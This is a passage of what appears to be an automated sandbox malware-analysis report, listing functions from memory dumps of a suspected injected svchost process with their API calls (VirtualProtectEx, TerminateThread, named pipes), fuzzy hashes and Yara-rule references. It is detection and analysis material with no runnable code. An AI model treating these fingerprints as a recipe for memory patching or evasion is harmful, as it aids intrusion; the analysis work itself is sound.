Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: 08016139710A8196E710DB12A8687AA63A1F7D8FC1F484439CF8943B54DF3EC5C6C380

Function 0000016C211C37AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000016C211C37C8
GetCurrentProcess.KERNEL32 ref: 0000016C211C37D6
VirtualProtectEx.KERNEL32 ref: 0000016C211C37F8
GetCurrentProcess.KERNEL32 ref: 0000016C211C3819
VirtualProtectEx.KERNEL32 ref: 0000016C211C383A
TerminateThread.KERNEL32 ref: 0000016C211C3849

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: 934eb001b1cb7162b0e216a884923300c4674e87acb582378c00ea91b59b03a6
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: E611007D62174182EF149B21EC297A766A0B7A4B43F04052DCF8907B54EF3EC4888784

Function 0000016C211637AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000016C211637C8
GetCurrentProcess.KERNEL32 ref: 0000016C211637D6
VirtualProtectEx.KERNEL32 ref: 0000016C211637F8
GetCurrentProcess.KERNEL32 ref: 0000016C21163819
VirtualProtectEx.KERNEL32 ref: 0000016C2116383A
TerminateThread.KERNEL32 ref: 0000016C21163849

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: 64e59f46e64f06106c6c836562cd6f2a238e09a8be9dfe14bfa89a9781147d00
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: E711007962174082FB159B21EC297A767A4B7A4B46F04052CCF9907B54EF3EC4898780

Function 0000016C211C90D8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000016C211C9103
_IsNonwritableInCurrentImage.LIBCMT ref: 0000016C211C9198
RtlUnwindEx.NTDLL ref: 0000016C211C91E7

Strings

csm, xrefs: 0000016C211C917E
f, xrefs: 0000016C211C9116

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction ID: f7ba546e9277d5811feab243473af8ccecbc6f33e557625624f296682fe93f4d
Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction Fuzzy Hash: 5951C03A2117488AEB14CF15EC54BA937A6F3E4B99F508128DFC667B4CDB36C881C781

Function 0000016C211690D8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000016C21169103
_IsNonwritableInCurrentImage.LIBCMT ref: 0000016C21169198
RtlUnwindEx.NTDLL ref: 0000016C211691E7

Strings

f, xrefs: 0000016C21169116
csm, xrefs: 0000016C2116917E

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction ID: 1d30a4ad186390c9e0d4840222c74d1c9733709403f953b60591c853786e2936
Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction Fuzzy Hash: 57519F3A2116848BEB18CF15E854BA93795F3A4B99F50812CDF9647B4CDB37C981C780

Function 0000016C211C1AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 0000016C211C1AD8
StrCmpNIW.SHLWAPI ref: 0000016C211C1AF2
lstrlenW.KERNEL32 ref: 0000016C211C1B01
StrCpyW.SHLWAPI ref: 0000016C211C1B16

Strings

\\?\, xrefs: 0000016C211C1AE6

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: 38928c02b528579af5d7bae62b313c1acf318529d3f074dccf620c7c50be4a79
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: 9BF0497A32464192EB208B21FDA43EA6770F7A4785F848028CFCD46D54DE3DC6C8CB40

Function 0000016C21161AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 0000016C21161AD8
StrCmpNIW.SHLWAPI ref: 0000016C21161AF2
lstrlenW.KERNEL32 ref: 0000016C21161B01
StrCpyW.SHLWAPI ref: 0000016C21161B16

Strings

\\?\, xrefs: 0000016C21161AE6

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: 9b7840b394ccd3146b75787221a045a794df19c5b2db47af64ea84a163f0a43f
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: FAF0123531464191E7608B11F8A43EA6771F7D4785F848028CF8946E54DB3EC689C740

Function 0000016C211C3200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 0000016C211C3222
StrCpyW.SHLWAPI ref: 0000016C211C3232
StrCatW.SHLWAPI ref: 0000016C211C323E
PathCombineW.SHLWAPI ref: 0000016C211C324C

Strings

\\.\pipe\, xrefs: 0000016C211C3218

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: 4377eca575200541bc068a17ec7c44b59f055b8dd3054bdcbf4df45d710714a1
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 49F05E7C624B9092EE008B13BD241AAA221ABD8FD2F0881359FDA17F68DE39C4C1C744

Function 0000016C21163200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 0000016C21163222
StrCpyW.SHLWAPI ref: 0000016C21163232
StrCatW.SHLWAPI ref: 0000016C2116323E
PathCombineW.SHLWAPI ref: 0000016C2116324C

Strings

\\.\pipe\, xrefs: 0000016C21163218

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: 09a551e2576c1e1e1828cb1cd6a88af1379804f78d2d462a0b9fb8b4ec20fbc5
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 70F0543825478091EA104B13BD241A65221A7D8FD1F0841399FDA07F58CF39C4C2C340

Function 0000016C211CA138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 0000016C211CA154
GetProcAddress.KERNEL32 ref: 0000016C211CA16A
FreeLibrary.KERNEL32 ref: 0000016C211CA187

Strings

mscoree.dll, xrefs: 0000016C211CA14B
CorExitProcess, xrefs: 0000016C211CA163

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: bb09d4438f15394d5284822d0427073e105dfb170ff5edabe1c69cf5f87db961
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: BFF0FEBD33174491EF594B60ECA43B62760ABE8BD2F44201D9E8B85EA4DE39C4C8C790

Function 0000016C2116A138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 0000016C2116A154
GetProcAddress.KERNEL32 ref: 0000016C2116A16A
FreeLibrary.KERNEL32 ref: 0000016C2116A187

Strings

mscoree.dll, xrefs: 0000016C2116A14B
CorExitProcess, xrefs: 0000016C2116A163

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: 82d18f0b93f92c228c2b74be57c17776735e3b83a3eb480ea41b3336fafa7092
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: 7AF0FE7972168491EB554B60ECA43F527A0ABE8BD2F44201D9E8B45FA4DF3AC5CAC780

Function 0000016C211C51B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000016C211C5236

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: dd61280ac11a25296d520c90dfdaece8e28f6ff81278e64993a8f652d91a9b14
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: 6A02EC36219B8086DBA0CB55E8903AAB7A0F3D5791F105119EBCE97FA8DF7DC484CB41

Function 0000016C211651B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000016C21165236

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: 356b17c029959c08516d84d7cd97fa2a6821d2801db75080b43b419af4c228c3
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: 3802BB36119BC486D7A0CB55E8943AAB7A0F3D5795F104119EBCE87FA8DB7EC484CB40

Function 0000016C211D0860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000016C211D08A2
GetConsoleMode.KERNEL32 ref: 0000016C211D0960
GetLastError.KERNEL32 ref: 0000016C211D09EA

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: fe77374a09dca7d543514377ed791f002296bac17a533dad29f1ebfb35ee49eb
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: AA81AF3EA2065089FF509B659C603FE26A0F7E4B86F44421DDF8A63E91DA36C4C1C391

Function 0000016C21170860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000016C211708A2
GetConsoleMode.KERNEL32 ref: 0000016C21170960
GetLastError.KERNEL32 ref: 0000016C211709EA

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: d5fbcfd7ec085aab715a47625d0c055684090887df5d9bbfaf1f5676c6585595
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: 4E817D3A61075089FB50AB659C603FD27A0B7E6B9AF44421EDF8A57F91DB36C4C2C390

Function 0000016C211C57F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000016C211C5806

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction ID: 99dfc4fcf1f808c1d587f51ed2563903beb1e99f7f72296784ee9e5aae22c6ef
Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction Fuzzy Hash: 5461DD3A619B40C6EBA08B15E8643AA77A0F3D8755F105119EFCD53FA4DB7EC480CB82

Function 0000016C211657F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000016C21165806

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction ID: 61f0b93766a00fae6dbea4e132b4cd45a7461bf2a2a0a27bac384a8aeabd8e9b
Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction Fuzzy Hash: 3061CA3A519B84C6EBA09B15E86436A77A4F3D8785F100119EFCD43FA8DB7EC581CB80

Function 0000016C211D1EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000016C211D1EE0
_set_statfp.LIBCMT ref: 0000016C211D1EFB
_set_statfp.LIBCMT ref: 0000016C211D1F17
_set_statfp.LIBCMT ref: 0000016C211D1F53

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 8a7605fd38867d60ada5b06d266a96cd1804c8da42d7adf0330415e10fdf2cc1
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: E311517EA78A1101FF981164EC763F51141ABF8376F0846ACAFF606ED68B76CCC54182

Function 0000016C21171EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000016C21171EE0
_set_statfp.LIBCMT ref: 0000016C21171EFB
_set_statfp.LIBCMT ref: 0000016C21171F17
_set_statfp.LIBCMT ref: 0000016C21171F53

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: cbe74e5557a6928f4c23d3cd38acda0c45c4d79c392677fa95702988565d9402
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: AC113D3AA58A1101F7981164EC763F910516BF4376F14462DFFE606BDA8B76C8C74182

Function 0000016C211412B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000016C211412E0
_set_statfp.LIBCMT ref: 0000016C211412FB
_set_statfp.LIBCMT ref: 0000016C21141317
_set_statfp.LIBCMT ref: 0000016C21141353

Memory Dump Source

Source File: 0000000D.00000002.2633076698.0000016C21130000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21130000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21130000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: f6e5840d214e0c46fe94ff9651f314c378c8351b146e632a0cb17b36d6b872be
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 6711903E648A4401F75411A7EC713F900806BF4B76E18022CAFE726EDA8BF6ECC14180

Function 0000016C211C3878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000016C211C3886
GetCurrentProcess.KERNEL32 ref: 0000016C211C38B4
VirtualProtectEx.KERNEL32 ref: 0000016C211C38D6
GetCurrentProcess.KERNEL32 ref: 0000016C211C38F4
VirtualProtectEx.KERNEL32 ref: 0000016C211C3915

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: d96b6838e40694c20336e9cbe345d469acdb5eb1a72706f69234e055943d4d8f
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 92112A3E724B4182EF149B21F8242EBA6B0F798B85F044129DFC907B94EE3EC585C744

Function 0000016C21163878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000016C21163886
GetCurrentProcess.KERNEL32 ref: 0000016C211638B4
VirtualProtectEx.KERNEL32 ref: 0000016C211638D6
GetCurrentProcess.KERNEL32 ref: 0000016C211638F4
VirtualProtectEx.KERNEL32 ref: 0000016C21163915

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: c344c7cc02d7ea509f1fc1209fe6c775939eda1f1a2da58c0bd39e48754c0cd9
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 62112A3A724B8082EB159B21F8242AAA7B4F798B85F04412DDFDD07B94EF3EC585C740

Function 0000016C211384F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000016C21138503
_IsNonwritableInCurrentImage.LIBCMT ref: 0000016C21138598

Strings

csm, xrefs: 0000016C2113857E
f, xrefs: 0000016C21138516

Memory Dump Source

Source File: 0000000D.00000002.2633076698.0000016C21130000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21130000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21130000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 253726c5d639c39e95ab2dcefa6d70e814a7a55e29fc28ddf3bd71fc52bbae63
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 7751A4BA2116808AEB14DF15EC54BA83395F3E0B99F518238DF8643B8CE776C8C19784

Function 0000016C211384D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000016C21138503
_IsNonwritableInCurrentImage.LIBCMT ref: 0000016C21138598

Strings

csm, xrefs: 0000016C2113857E
f, xrefs: 0000016C21138516

Memory Dump Source

Source File: 0000000D.00000002.2633076698.0000016C21130000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21130000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21130000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: a42fea92dc332d1eae579d8efc7afea52b6d346f6bfe9fd9374ab4b4e8984951
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: E1319079211690C6E714DF12EC547A937A4F7A0BDAF158228AF8747B8CDB3AC981C784

Function 0000016C211614B4 Relevance: 6.3, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000016C211614D5
HeapFree.KERNEL32 ref: 0000016C211614E4
GetProcessHeap.KERNEL32 ref: 0000016C211614F0
HeapFree.KERNEL32 ref: 0000016C211614FF
GetProcessHeap.KERNEL32 ref: 0000016C2116152A

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
Instruction ID: 48a5b5769b54eb6cf7f624361beb1fef3d473a9274f33a8d8fd7a625351376e8
Opcode Fuzzy Hash: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
Instruction Fuzzy Hash: 87112139564B84D6E7549F66B8542AA73B0F7D9B85F044019DFCA03F54DF3AC092C784

Function 0000016C211C26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000016C211C27D4
StrCpyW.SHLWAPI ref: 0000016C211C27ED

Strings

\\.\pipe\, xrefs: 0000016C211C27DF

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: ddcea61fa900e8203a9dcc6e602d83c1eb9b89408a54a90cf96bde6e779732e2
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: D671C53A21479182EB689E259D643FA6791F7E4BC5F44001ADFC963F88DE36C584C781

Function 0000016C211626F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000016C211627D4
StrCpyW.SHLWAPI ref: 0000016C211627ED

Strings

\\.\pipe\, xrefs: 0000016C211627DF

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: e34381f2ed03d1b4c40e2bfa40563fd32f9153b7ffd81cc41305eaaeb94b8e9b
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: 3771BF3A2107D182E7289A259D643FAB694F7E5BC6F44001EDF8943F89EE37C684C780

Function 0000016C211C24DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000016C211C25C3
StrCpyW.SHLWAPI ref: 0000016C211C25DA

Strings

\\.\pipe\, xrefs: 0000016C211C25CE

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

